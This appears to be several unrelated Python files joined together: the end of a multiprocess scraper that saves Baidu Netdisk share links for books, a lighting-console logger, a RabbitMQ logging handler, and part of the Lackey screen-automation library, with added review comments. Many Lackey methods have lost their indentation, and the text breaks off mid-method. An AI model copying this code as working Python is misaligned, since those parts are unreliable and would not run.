                    print(f'百度网盘链接: {share_url}, 验证码: {vc}')
                    nd.save(url=share_url, pwd=vc, verbose=False, save_path='Book/' + path)
                    # Fix: record the URL in the same pool the duplicate check
                    # reads. The original added to the global share_url_pool
                    # while testing membership against the url_pool parameter.
                    url_pool.add(share_url)
        except Exception as e:
            # Best-effort scraping: log and move on to the next listing page.
            print(e)
# Fan out the scraping work across worker processes and time the whole run.
start = time.time()
num_workers = 8
processes = []
for _ in range(num_workers):
    processes.append(Process(target=save_d4j, args=(book_lists_queue, share_url_pool)))
for p in processes:
    p.start()
# NOTE(review): the fixed sleep before join() gives workers a head start;
# its exact purpose is not evident from this file — confirm it is needed.
time.sleep(120)
for p in processes:
    p.join()
end = time.time()
print(f'done. {round(end - start, 4)} seconds used.')
|
loggingconsole.py | """
@copyright: 2013 Single D Software - All Rights Reserved
@summary: Debugging console interface for Light Maestro.
"""
# Standard library imports
import logging
import threading
import time
# Application imports
import console
# Named logger for this module
_logger = logging.getLogger(__name__)
class LoggingConsole(console.Console):
    """Provide a generic console class that's useful for debugging.

    Periodically logs the values of the first ``maxchannels`` channels,
    one space-separated line per poll interval.
    """

    def _channellogger(self):
        # Background loop: sleep one poll interval, then log channel values.
        # self._channels is expected to be provided by console.Console —
        # NOTE(review): confirm against the base class.
        while True:
            time.sleep(self._polldelay)
            values = (v for c, v in self._channels.items() if int(c) <= self._maxchannels)
            valuesstr = ' '.join('{0:5.1f}'.format(v) for v in values)
            _logger.info(valuesstr)

    def __init__(self, paramstring):
        """Initialize from ``"<maxchannels>,<polls_per_second>"``."""
        params = paramstring.split(',')
        self._maxchannels = int(params[0])
        # Convert polls-per-second into a sleep interval in seconds.
        self._polldelay = 1.0 / float(params[1])
        super().__init__()
        # Fix: run the logger as a daemon thread. The original thread was
        # non-daemon, and its infinite loop kept the process alive forever
        # at shutdown.
        threading.Thread(target=self._channellogger, daemon=True).start()
|
handlers_oneway.py | # -*- coding: utf-8 -*-
import logging
import threading
from copy import copy
import pika
from pika import credentials
from .compat import Queue
from .filters import FieldFilter
from .formatters import JSONFormatter
from .compat import ExceptionReporter
class RabbitMQHandlerOneWay(logging.Handler):
    """
    Python/Django logging handler to ship logs to RabbitMQ.
    Inspired by: https://github.com/ziXiong/MQHandler

    emit() formats the record and enqueues it; a daemon worker thread owns
    the RabbitMQ connection and publishes queued records, so logging calls
    never block on the broker.
    """

    def __init__(self, level=logging.NOTSET, formatter=None,
                 host='localhost', port=5672, connection_params=None,
                 username=None, password=None,
                 exchange='log', declare_exchange=False,
                 routing_key_format="{name}.{level}",
                 routing_key_formatter=None,
                 close_after_emit=False,
                 fields=None, fields_under_root=True, message_headers=None,
                 record_fields=None, exclude_record_fields=None,
                 heartbeat=60):
        # Initialize the handler.
        #
        # :param level: Logs level.
        # :param formatter: Use custom formatter for the logs.
        # :param host: RabbitMQ host. Default localhost
        # :param port: RabbitMQ Port. Default 5672
        # :param connection_params: Allow extra params to connect with RabbitMQ.
        # :param message_headers: A dictionary of headers to be published with the message. Optional.
        # :param username: Username in case of authentication.
        # :param password: Password for the username.
        # :param exchange: Send logs using this exchange.
        # :param declare_exchange: Whether or not to declare the exchange.
        # :param routing_key_format: Customize how messages will be routed to the queues.
        # :param routing_key_formatter: Override how messages will be routed to the queues.
        #                              Formatter is passed record object.
        # :param close_after_emit: Close connection after emit the record?
        # :param fields: Send these fields as part of all logs.
        # :param fields_under_root: Merge the fields in the root object.
        # :record_fields: A set of attributes that should be preserved from the record object.
        # :exclude_record_fields: A set of attributes that should be ignored from the record object.
        # :heartbeat: Lower bound for heartbeat timeout.
        super(RabbitMQHandlerOneWay, self).__init__(level=level)

        # Important instances/properties.
        self.exchange = exchange
        self.connection = None
        self.channel = None
        self.exchange_declared = not declare_exchange
        self.routing_key_format = routing_key_format
        self.close_after_emit = close_after_emit

        # Connection parameters.
        # Allow extra params when connect to RabbitMQ.
        # @see: http://pika.readthedocs.io/en/0.10.0/modules/parameters.html#pika.connection.ConnectionParameters
        conn_params = connection_params if isinstance(connection_params, dict) else {}
        self.connection_params = conn_params.copy()
        self.connection_params.update(dict(host=host, port=port, heartbeat=heartbeat, blocked_connection_timeout=150))

        if username and password:
            self.connection_params['credentials'] = credentials.PlainCredentials(username, password)

        # Extra params for message publication
        self.message_headers = message_headers

        # Save routing-key formatter.
        self.routing_key_formatter = routing_key_formatter

        # Logging.
        self.formatter = formatter or JSONFormatter(
            include=record_fields,
            exclude=exclude_record_fields
        )
        self.fields = fields if isinstance(fields, dict) else {}
        self.fields_under_root = fields_under_root

        if len(self.fields) > 0:
            self.addFilter(FieldFilter(self.fields, self.fields_under_root))

        # Connect.
        self.createLock()

        # message queue
        self.queue = Queue()
        self.start_message_worker()

    def open_connection(self):
        """
        Connect to RabbitMQ.
        """
        # Set logger for pika.
        # See if something went wrong connecting to RabbitMQ.
        if not self.connection or self.connection.is_closed or not self.channel or self.channel.is_closed:
            handler = logging.StreamHandler()
            handler.setFormatter(self.formatter)
            rabbitmq_logger = logging.getLogger('pika')
            rabbitmq_logger.addHandler(handler)
            rabbitmq_logger.propagate = False
            rabbitmq_logger.setLevel(logging.WARNING)

            # Connect.
            if not self.connection or self.connection.is_closed:
                self.connection = pika.BlockingConnection(pika.ConnectionParameters(**self.connection_params))

            if not self.channel or self.channel.is_closed:
                self.channel = self.connection.channel()

            if self.exchange_declared is False:
                self.channel.exchange_declare(exchange=self.exchange, exchange_type='topic', durable=True, auto_delete=False)
                self.exchange_declared = True

            # Manually remove logger to avoid shutdown message.
            rabbitmq_logger.removeHandler(handler)

    def close_connection(self):
        """
        Close active connection.
        """
        if self.channel:
            self.channel.close()

        if self.connection:
            self.connection.close()

        self.connection, self.channel = None, None

    def start_message_worker(self):
        """Start the background publisher thread."""
        worker = threading.Thread(target=self.message_worker)
        # Fix: set the daemon attribute directly — Thread.setDaemon() is
        # deprecated. The worker must be a daemon so its endless loop never
        # prevents interpreter shutdown.
        worker.daemon = True
        worker.start()

    def message_worker(self):
        """Publish queued (formatted_record, routing_key) pairs forever."""
        while True:
            # Fix: dequeue outside the try block. In the original, a failure
            # inside queue.get() left `record` unbound in the except handler
            # and the finally clause called task_done() for an item that was
            # never retrieved.
            record, routing_key = self.queue.get()
            try:
                if not self.connection or self.connection.is_closed or not self.channel or self.channel.is_closed:
                    self.open_connection()

                self.channel.basic_publish(
                    exchange=self.exchange,
                    routing_key=routing_key,
                    body=record,
                    properties=pika.BasicProperties(
                        delivery_mode=2,
                        headers=self.message_headers
                    )
                )
            except Exception:
                # Drop the connection so the next message triggers a reconnect.
                self.channel, self.connection = None, None
                self.handleError(record)
            finally:
                self.queue.task_done()

            if self.close_after_emit:
                self.close_connection()

    def emit(self, record):
        """Format the record and enqueue it for the worker thread."""
        try:
            if self.routing_key_formatter:
                routing_key = self.routing_key_formatter(record)
            else:
                routing_key = self.routing_key_format.format(
                    name=record.name,
                    level=record.levelname
                )

            if hasattr(record, 'request'):
                # Presumably a Django request: strip unpicklable attributes
                # and render the traceback into text before formatting.
                no_exc_record = copy(record)
                del no_exc_record.exc_info
                del no_exc_record.exc_text
                del no_exc_record.request

                if record.exc_info:
                    exc_info = record.exc_info
                else:
                    exc_info = (None, record.getMessage(), None)

                if ExceptionReporter:
                    reporter = ExceptionReporter(record.request, is_email=False, *exc_info)
                    no_exc_record.traceback = reporter.get_traceback_text()

                formatted = self.format(no_exc_record)
            else:
                formatted = self.format(record)

            self.queue.put((formatted, routing_key))
        except Exception:
            self.channel, self.connection = None, None
            self.handleError(record)

    def close(self):
        """
        Free resources.
        """
        self.acquire()

        try:
            self.close_connection()
        finally:
            self.release()
|
RegionMatching.py | from PIL import Image, ImageTk
from numbers import Number
try:
import Tkinter as tk
import tkMessageBox as tkmb
except ImportError:
import tkinter as tk
import tkinter.messagebox as tkmb
import multiprocessing
import subprocess
import pyperclip
import tempfile
import platform
import numpy
import time
import uuid
import cv2
import sys
import os
import re
from .InputEmulation import Mouse as MouseClass, Keyboard
from .Exceptions import FindFailed, ImageMissing
from .SettingsDebug import Settings, Debug
from .TemplateMatchers import PyramidTemplateMatcher as TemplateMatcher
from .Geometry import Location
# Select the platform backend; Lackey only supports Windows and macOS.
if platform.system() == "Windows" or os.environ.get('READTHEDOCS') == 'True':
    # Avoid throwing an error if it's just being imported for documentation purposes
    from .PlatformManagerWindows import PlatformManagerWindows
    PlatformManager = PlatformManagerWindows()
elif platform.system() == "Darwin":
    from .PlatformManagerDarwin import PlatformManagerDarwin
    PlatformManager = PlatformManagerDarwin()
else:
    raise NotImplementedError("Lackey is currently only compatible with Windows and OSX.")

# Python 3 compatibility
try:
    basestring
except NameError:
    # Python 3 has no basestring; alias it to str so isinstance checks work.
    basestring = str
try:
    FOREVER = float("inf")
except:
    # Fallback if float("inf") is unavailable on this build.
    import math
    FOREVER = math.inf

# Instantiate input emulation objects
Mouse = MouseClass()
keyboard = Keyboard()
class Pattern(object):
    """ Defines a pattern based on a bitmap, similarity, and target offset """

    def __init__(self, target=None):
        """Build a pattern from another Pattern, an image filename, or a
        numpy image array. With no target, creates an empty (invalid) pattern.
        """
        self.path = None
        # Fix: default the image to None so isValid() on an empty Pattern
        # returns False instead of raising AttributeError.
        self.image = None
        self.similarity = Settings.MinSimilarity
        self.offset = Location(0, 0)
        self.imagePattern = False
        if isinstance(target, Pattern):
            self.image = target.getImage()
            self.similarity = target.similarity
            self.offset = target.offset.offset(0, 0) # Clone Location
            self.imagePattern = target.isImagePattern()
        elif isinstance(target, basestring):
            self.setFilename(target)
        elif isinstance(target, numpy.ndarray):
            self.setImage(target)
        elif target is not None:
            raise TypeError("Unrecognized argument for Pattern()")

    def similar(self, similarity):
        """ Returns a new Pattern with the specified similarity threshold """
        pattern = Pattern(self.path)
        pattern.similarity = similarity
        return pattern

    def getSimilar(self):
        """ Returns the current minimum similarity """
        return self.similarity

    def exact(self):
        """ Returns a new Pattern with a similarity threshold of 1.0 """
        pattern = Pattern(self.path)
        pattern.similarity = 1.0
        return pattern

    def isValid(self):
        """ True if this pattern has an image loaded """
        return (self.image is not None)

    def targetOffset(self, dx, dy):
        """ Returns a new Pattern with the given target offset """
        pattern = Pattern(self.path)
        pattern.similarity = self.similarity
        pattern.offset = Location(dx, dy)
        return pattern

    def getFilename(self):
        """ Returns the path to this Pattern's bitmap """
        return self.path

    def setFilename(self, filename):
        """ Set the filename of the pattern's image (and load it) """
        ## Loop through image paths to find the image
        found = False
        for image_path in sys.path + [Settings.BundlePath, os.getcwd()] + Settings.ImagePaths:
            full_path = os.path.join(image_path, filename)
            if os.path.exists(full_path):
                # Image file found (the original comment here said the
                # opposite); stop searching.
                found = True
                break
        ## Check if path is valid
        if not found:
            self.path = filename
            print(Settings.ImagePaths)
            # NOTE(review): ImageMissingEvent must be defined elsewhere in
            # this module — it is not among the visible imports; confirm.
            raise ImageMissing(ImageMissingEvent(pattern=self, event_type="IMAGEMISSING"))
        self.path = full_path
        self.image = cv2.imread(self.path)
        return self

    def setImage(self, img):
        """ Set the pattern's image directly from a numpy array """
        self.image = img
        self.imagePattern = True
        return self

    def getImage(self):
        """ Returns the pattern's image as a numpy array """
        return self.image

    def getTargetOffset(self):
        """ Returns the target offset as a Location(dx, dy) """
        return self.offset

    def isImagePattern(self):
        """ True if this pattern was built directly from an image array """
        return self.imagePattern

    def debugPreview(self, title="Debug"):
        """ Loads and displays the image at ``Pattern.path`` """
        haystack = Image.open(self.path)
        haystack.show()
class Region(object):
    def __init__(self, *args):
        """Build a region from (x, y, w, h), another Region, an (x, y, w, h)
        tuple, (x, y, w, h, screen), or a minimal (x, y) point.
        """
        if len(args) == 4:
            x, y, w, h = args
        elif len(args) == 1:
            if isinstance(args[0], Region):
                x, y, w, h = args[0].getTuple()
            elif isinstance(args[0], tuple):
                x, y, w, h = args[0]
            else:
                raise TypeError("Unrecognized argument for Region()")
        elif len(args) == 5:
            # We can safely ignore Sikuli's screen argument, as that's
            # checked dynamically by the location of the region
            x, y, w, h, screen = args
        elif len(args) == 2:
            # Minimal point-like region
            x, y = args
            w = 1
            h = 1
        else:
            raise TypeError("Unrecognized argument(s) for Region()")
        self.FOREVER = None
        self.setROI(x, y, w, h)
        # Cached results of the most recent find()/findAll() calls.
        self._lastMatch = None
        self._lastMatches = []
        self._lastMatchTime = 0
        self.autoWaitTimeout = 3.0
        # Converts searches per second to actual second interval
        self._defaultScanRate = None
        self._defaultTypeSpeed = 0.05
        self._raster = (0, 0)
        self._observer = Observer(self)
        self._observeScanRate = None
        self._repeatWaitTime = 0.3
        # FindFailed handling configuration (see find()/_raiseFindFailed).
        self._throwException = True
        self._findFailedResponse = "ABORT"
        self._findFailedHandler = None
        self._highlighter = None
CREATE_X_DIRECTION_LEFT = 0
CREATE_X_DIRECTION_RIGHT = 1
CREATE_Y_DIRECTION_TOP = 0
CREATE_Y_DIRECTION_BOTTOM = 1
@classmethod
def create(cls, *args):
if len(args) == 3 and isinstance(args[0], Location):
return cls(args[0].x, args[0].y, args[1], args[2])
elif len(args) == 5 and isinstance(args[0], Location):
loc, create_x_direction, create_y_direction, w, h = args
if create_x_direction == cls.CREATE_X_DIRECTION_LEFT:
x = loc.x
else:
x = loc.x - w
if create_y_direction == cls.CREATE_Y_DIRECTION_TOP:
y = loc.y
else:
y = loc.y - h
return cls(x, y, w, h)
    def setX(self, x):
        """ Set the x-coordinate of the upper left-hand corner """
        self.x = int(x)
    def setY(self, y):
        """ Set the y-coordinate of the upper left-hand corner """
        self.y = int(y)
    def setW(self, w):
        """ Set the width of the region (clamped to a minimum of 1) """
        self.w = max(1, int(w))
    def setH(self, h):
        """ Set the height of the region (clamped to a minimum of 1) """
        self.h = max(1, int(h))
    def getX(self):
        """ Get the x-coordinate of the upper left-hand corner """
        return self.x
    def getY(self):
        """ Get the y-coordinate of the upper left-hand corner """
        return self.y
    def getW(self):
        """ Get the width of the region """
        return self.w
    def getH(self):
        """ Get the height of the region """
        return self.h
    def getTuple(self):
        """ Returns the shape of the region as an (x, y, w, h) tuple """
        return (self.x, self.y, self.w, self.h)
    def setLocation(self, location):
        """ Change the upper left-hand corner to a new ``Location``

        Doesn't change width or height. Returns self for chaining.
        Raises ValueError if ``location`` is falsy or not a Location.
        """
        if not location or not isinstance(location, Location):
            raise ValueError("setLocation expected a Location object")
        self.x = location.x
        self.y = location.y
        return self
    # Sikuli-compatible alias.
    moveTo = setLocation
    def setROI(self, *args):
        """ Set Region of Interest (same as Region.setRect())

        Accepts (x, y, w, h) numbers, another Region, or an (x, y, w, h) tuple.
        """
        if len(args) == 4:
            x, y, w, h = args
        elif len(args) == 1:
            if isinstance(args[0], Region):
                x, y, w, h = args[0].getTuple()
            elif isinstance(args[0], tuple):
                x, y, w, h = args[0]
            else:
                raise TypeError("Unrecognized argument for Region()")
        else:
            raise TypeError("Unrecognized argument(s) for Region()")
        # Route through the setters so int conversion / clamping applies.
        self.setX(x)
        self.setY(y)
        self.setW(w)
        self.setH(h)
    # Sikuli-compatible alias.
    setRect = setROI
    def contains(self, point_or_region):
        """ Checks if ``point_or_region`` is within this region

        Note the comparisons are strict (<), so points exactly on the
        region's border are not considered contained.
        """
        if isinstance(point_or_region, Location):
            return (self.x < point_or_region.x < self.x + self.w) and (self.y < point_or_region.y < self.y + self.h)
        elif isinstance(point_or_region, Region):
            # A region counts as contained only if both its top-left and
            # bottom-right corners fall strictly inside this region.
            return ((self.x < point_or_region.getX() < self.x + self.w) and
                    (self.y < point_or_region.getY() < self.y + self.h) and
                    (self.x < point_or_region.getX() + point_or_region.getW() < self.x + self.w) and
                    (self.y < point_or_region.getY() + point_or_region.getH() < self.y + self.h))
        else:
            raise TypeError("Unrecognized argument type for contains()")
    def containsMouse(self):
        """ Checks if the current mouse position is inside this region """
        return self.contains(Mouse.getPos())
    def morphTo(self, region):
        """ Change shape of this region to match the given ``Region`` object

        Returns self for chaining. Raises TypeError if ``region`` is falsy
        or not a Region.
        """
        if not region or not isinstance(region, Region):
            raise TypeError("morphTo expected a Region object")
        self.setROI(region)
        return self
def copyTo(self, screen):
if not isinstance(screen, Screen):
# Parameter was screen ID instead of object
screen = Screen(screen)
zero_coord = Location(screen.getX(), screen.getY())
this_screen = self.getScreen()
offset = Location(this_screen.getX() - zero_coord.x, this_screen.getY() - zero_coord.y)
target_coord = zero_coord.offset(offset.x, offset.y)
return Region(self).setLocation(target_coord)
    def getCenter(self):
        """ Return the ``Location`` of the center of this region """
        return Location(self.x+(self.w/2), self.y+(self.h/2))
    def getTopLeft(self):
        """ Return the ``Location`` of the top left corner of this region """
        return Location(self.x, self.y)
    def getTopRight(self):
        """ Return the ``Location`` of the top right corner of this region """
        return Location(self.x+self.w, self.y)
    def getBottomLeft(self):
        """ Return the ``Location`` of the bottom left corner of this region """
        return Location(self.x, self.y+self.h)
    def getBottomRight(self):
        """ Return the ``Location`` of the bottom right corner of this region """
        return Location(self.x+self.w, self.y+self.h)
    def getScreen(self):
        """ Return an instance of the ``Screen`` object this region is inside.

        Checks the top left corner of this region (if it touches multiple screens) is inside.
        Returns None if the region isn't positioned in any screen.
        """
        return self.getTopLeft().getScreen()
    def getLastMatch(self):
        """ Returns the last successful ``Match`` returned by ``find()``, ``exists()``, etc. """
        return self._lastMatch
    def getLastMatches(self):
        """ Returns the last successful set of ``Match`` objects returned by ``findAll()`` """
        return self._lastMatches
    def getTime(self):
        """ Returns the elapsed time in milliseconds to find the last match """
        return self._lastMatchTime
    def setAutoWaitTimeout(self, seconds):
        """ Specify the time to wait for an image to appear on the screen """
        self.autoWaitTimeout = float(seconds)
    def getAutoWaitTimeout(self):
        """ Returns the time to wait for an image to appear on the screen """
        return self.autoWaitTimeout
def setWaitScanRate(self, seconds=None):
"""Set this Region's scan rate
A find op should repeat the search for the given Visual rate times per second until
found or the maximum waiting time is reached.
"""
self._defaultScanRate = float(seconds)
def getWaitScanRate(self):
""" Get the current scan rate """
return self._defaultScanRate if not self._defaultScanRate is None else Settings.WaitScanRate
def offset(self, location, dy=0):
""" Returns a new ``Region`` offset from this one by ``location``
Width and height remain the same
"""
if not isinstance(location, Location):
# Assume variables passed were dx,dy
location = Location(location, dy)
r = Region(self.x+location.x, self.y+location.y, self.w, self.h).clipRegionToScreen()
if r is None:
raise ValueError("Specified region is not visible on any screen")
return None
return r
    def grow(self, width, height=None):
        """ Expands the region by ``width`` on both sides and ``height`` on the top and bottom.

        If only one value is provided, expands the region by that amount on all sides.
        Equivalent to ``nearby()``.
        """
        if height is None:
            return self.nearby(width)
        else:
            return Region(
                self.x-width,
                self.y-height,
                self.w+(2*width),
                self.h+(2*height)).clipRegionToScreen()
    def inside(self):
        """ Returns the same object. Included for Sikuli compatibility. """
        return self
    def nearby(self, expand=50):
        """ Returns a new Region that includes the nearby neighbourhood of the the current region.

        The new region is defined by extending the current region's dimensions
        all directions by range number of pixels. The center of the new region remains the
        same.
        """
        return Region(
            self.x-expand,
            self.y-expand,
            self.w+(2*expand),
            self.h+(2*expand)).clipRegionToScreen()
    def above(self, expand=None):
        """ Returns a new Region above the current region with a height of ``expand`` pixels.

        Does not include the current region. If range is omitted, it reaches to the top of the
        screen. The new region has the same width and x-position as the current region.
        """
        if expand == None:
            # Reach from the top of the screen down to this region's top edge.
            x = self.x
            y = 0
            w = self.w
            h = self.y
        else:
            x = self.x
            y = self.y - expand
            w = self.w
            h = expand
        return Region(x, y, w, h).clipRegionToScreen()
    def below(self, expand=None):
        """ Returns a new Region below the current region with a height of ``expand`` pixels.

        Does not include the current region. If range is omitted, it reaches to the bottom
        of the screen. The new region has the same width and x-position as the current region.
        """
        if expand == None:
            x = self.x
            y = self.y+self.h
            w = self.w
            h = self.getScreen().getBounds()[3] - y # Screen height
        else:
            x = self.x
            y = self.y + self.h
            w = self.w
            h = expand
        return Region(x, y, w, h).clipRegionToScreen()
    def left(self, expand=None):
        """ Returns a new Region left of the current region with a width of ``expand`` pixels.

        Does not include the current region. If range is omitted, it reaches to the left border
        of the screen. The new region has the same height and y-position as the current region.
        """
        if expand == None:
            # Reach from the screen's left border to this region's left edge.
            x = 0
            y = self.y
            w = self.x
            h = self.h
        else:
            x = self.x-expand
            y = self.y
            w = expand
            h = self.h
        return Region(x, y, w, h).clipRegionToScreen()
    def right(self, expand=None):
        """ Returns a new Region right of the current region with a width of ``expand`` pixels.

        Does not include the current region. If range is omitted, it reaches to the right border
        of the screen. The new region has the same height and y-position as the current region.
        """
        if expand == None:
            x = self.x+self.w
            y = self.y
            w = self.getScreen().getBounds()[2] - x
            h = self.h
        else:
            x = self.x+self.w
            y = self.y
            w = expand
            h = self.h
        return Region(x, y, w, h).clipRegionToScreen()
    def add(self, l, r, t, b):
        """ Grow this region in place by l/r/t/b pixels on the left, right,
        top, and bottom respectively. Returns self for chaining.
        """
        x = self.getX() - l
        y = self.getY() - t
        w = self.getW() + l + r
        h = self.getH() + t + b
        self.setRect(x, y, w, h)
        return self
    def getBitmap(self):
        """ Captures screen area of this region, at least the part that is on the screen

        Returns image as numpy array
        """
        return PlatformManager.getBitmapFromRect(self.x, self.y, self.w, self.h)
    def debugPreview(self, title="Debug"):
        """ Displays the region in a preview window.

        If the region is a Match, circles the target area. If the region is larger than half the
        primary screen in either dimension, scales it down to half size.
        """
        region = self
        haystack = self.getBitmap()
        if isinstance(region, Match):
            # Circle the match's click target, translated to region-local coords.
            cv2.circle(
                haystack,
                (region.getTarget().x - self.x, region.getTarget().y - self.y),
                5,
                255)
        if haystack.shape[0] > (Screen(0).getBounds()[2]/2) or haystack.shape[1] > (Screen(0).getBounds()[3]/2):
            # Image is bigger than half the screen; scale it down
            haystack = cv2.resize(haystack, (0, 0), fx=0.5, fy=0.5)
        Image.fromarray(haystack).show()
    def highlight(self, *args):
        """ Highlights the region with a colored frame. Accepts the following parameters:

        highlight([toEnable], [seconds], [color])

        * toEnable (boolean): Enables or disables the overlay
        * seconds (number): Seconds to show overlay
        * color (string): Hex code ("#XXXXXX") or color name ("black")
        """
        # Default behavior: toggle — enable only if no overlay is currently shown
        toEnable = (self._highlighter is None)
        seconds = 3
        color = "red"
        if len(args) > 3:
            raise TypeError("Unrecognized argument(s) for highlight()")
        # Arguments are matched by type, not by position
        for arg in args:
            if type(arg) == bool:
                toEnable = arg
            elif isinstance(arg, Number):
                seconds = arg
            elif isinstance(arg, basestring):
                color = arg
        # Any existing overlay is always closed before (possibly) creating a new one
        if self._highlighter is not None:
            self._highlighter.close()
        if toEnable:
            self._highlighter = PlatformManager.highlight((self.getX(), self.getY(), self.getW(), self.getH()), color, seconds)
    def find(self, pattern):
        """ Searches for an image pattern in the given region.

        Throws ``FindFailed`` exception if the image could not be found.
        Sikuli supports OCR search with a text parameter. This does not (yet).
        """
        findFailedRetry = True
        while findFailedRetry:
            match = self.exists(pattern)
            if match is not None:
                break
            path = pattern.path if isinstance(pattern, Pattern) else pattern
            # _raiseFindFailed may raise FindFailed, return False (abort and
            # return None-ish match), or return True (retry after a pause)
            findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
            if findFailedRetry:
                time.sleep(self._repeatWaitTime)
        return match
def findAll(self, pattern):
""" Searches for an image pattern in the given region
Returns ``Match`` object if ``pattern`` exists, empty array otherwise (does not
throw exception). Sikuli supports OCR search with a text parameter. This does not (yet).
"""
find_time = time.time()
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
return None
seconds = self.autoWaitTimeout
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
if needle is None:
raise ValueError("Unable to load image '{}'".format(pattern.path))
needle_height, needle_width, needle_channels = needle.shape
positions = []
timeout = time.time() + seconds
# Check TemplateMatcher for valid matches
matches = []
while time.time() < timeout and len(matches) == 0:
matcher = TemplateMatcher(r.getBitmap())
matches = matcher.findAllMatches(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if len(matches) == 0:
Debug.info("Couldn't find '{}' with enough similarity.".format(pattern.path))
return iter([])
# Matches found! Turn them into Match objects
lastMatches = []
for match in matches:
position, confidence = match
x, y = position
lastMatches.append(
Match(
confidence,
pattern.offset,
((x+self.x, y+self.y), (needle_width, needle_height))))
self._lastMatches = iter(lastMatches)
Debug.info("Found match(es) for pattern '{}' at similarity ({})".format(pattern.path, pattern.similarity))
self._lastMatchTime = (time.time() - find_time) * 1000 # Capture find time in milliseconds
return self._lastMatches
    def wait(self, pattern, seconds=None):
        """ Searches for an image pattern in the given region, given a specified timeout period

        Functionally identical to find(). If a number is passed instead of a pattern,
        just waits the specified number of seconds.
        Sikuli supports OCR search with a text parameter. This does not (yet).
        """
        if isinstance(pattern, (int, float)):
            if pattern == FOREVER:
                while True:
                    time.sleep(1) # Infinite loop
            time.sleep(pattern)
            return None
        if seconds is None:
            seconds = self.autoWaitTimeout
        findFailedRetry = True
        timeout = time.time() + seconds
        while findFailedRetry:
            # Poll exists() until the pattern shows up or the timeout expires
            while True:
                match = self.exists(pattern)
                if match:
                    return match
                if time.time() >= timeout:
                    break
            path = pattern.path if isinstance(pattern, Pattern) else pattern
            # May raise FindFailed, return False (abort), or True (retry)
            findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
            if findFailedRetry:
                # NOTE(review): ``timeout`` is not reset here, so a retry after the
                # deadline polls exists() only once per cycle — confirm intended
                time.sleep(self._repeatWaitTime)
        return None
def waitVanish(self, pattern, seconds=None):
""" Waits until the specified pattern is not visible on screen.
If ``seconds`` pass and the pattern is still visible, raises FindFailed exception.
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
return None
if seconds is None:
seconds = self.autoWaitTimeout
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
match = True
timeout = time.time() + seconds
while match and time.time() < timeout:
matcher = TemplateMatcher(r.getBitmap())
# When needle disappears, matcher returns None
match = matcher.findBestMatch(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if match:
return False
#self._findFailedHandler(FindFailed("Pattern '{}' did not vanish".format(pattern.path)))
    def exists(self, pattern, seconds=None):
        """ Searches for an image pattern in the given region

        Returns Match if pattern exists, None otherwise (does not throw exception)
        Sikuli supports OCR search with a text parameter. This does not (yet).
        """
        find_time = time.time()
        r = self.clipRegionToScreen()
        if r is None:
            raise ValueError("Region outside all visible screens")
            return None  # (unreachable)
        if seconds is None:
            seconds = self.autoWaitTimeout
        if isinstance(pattern, int):
            # Actually just a "wait" statement
            time.sleep(pattern)
            return
        if not pattern:
            # NOTE(review): a falsy pattern sleeps but then falls through to
            # Pattern(pattern) below rather than returning — confirm intended
            time.sleep(seconds)
        if not isinstance(pattern, Pattern):
            if not isinstance(pattern, basestring):
                raise TypeError("find expected a string [image path] or Pattern object")
            pattern = Pattern(pattern)
        needle = cv2.imread(pattern.path)
        if needle is None:
            raise ValueError("Unable to load image '{}'".format(pattern.path))
        needle_height, needle_width, needle_channels = needle.shape
        match = None
        timeout = time.time() + seconds
        # Consult TemplateMatcher to find needle, re-capturing the region each pass
        while not match:
            matcher = TemplateMatcher(r.getBitmap())
            match = matcher.findBestMatch(needle, pattern.similarity)
            time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
            if time.time() > timeout:
                break
        if match is None:
            Debug.info("Couldn't find '{}' with enough similarity.".format(pattern.path))
            return None
        # Translate local position into global screen position
        position, confidence = match
        position = (position[0] + self.x, position[1] + self.y)
        self._lastMatch = Match(
            confidence,
            pattern.offset,
            (position, (needle_width, needle_height)))
        #self._lastMatch.debug_preview()
        Debug.info("Found match for pattern '{}' at ({},{}) with confidence ({}). Target at ({},{})".format(
            pattern.path,
            self._lastMatch.getX(),
            self._lastMatch.getY(),
            self._lastMatch.getScore(),
            self._lastMatch.getTarget().x,
            self._lastMatch.getTarget().y))
        self._lastMatchTime = (time.time() - find_time) * 1000 # Capture find time in milliseconds
        return self._lastMatch
def click(self, target=None, modifiers=""):
""" Moves the cursor to the target location and clicks the default mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("click expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1) # For responsiveness
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if modifiers != 0:
keyboard.keyUp(modifiers)
Debug.history("Clicked at {}".format(target_location))
def doubleClick(self, target=None, modifiers=""):
""" Moves the cursor to the target location and double-clicks the default mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("doubleClick expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1)
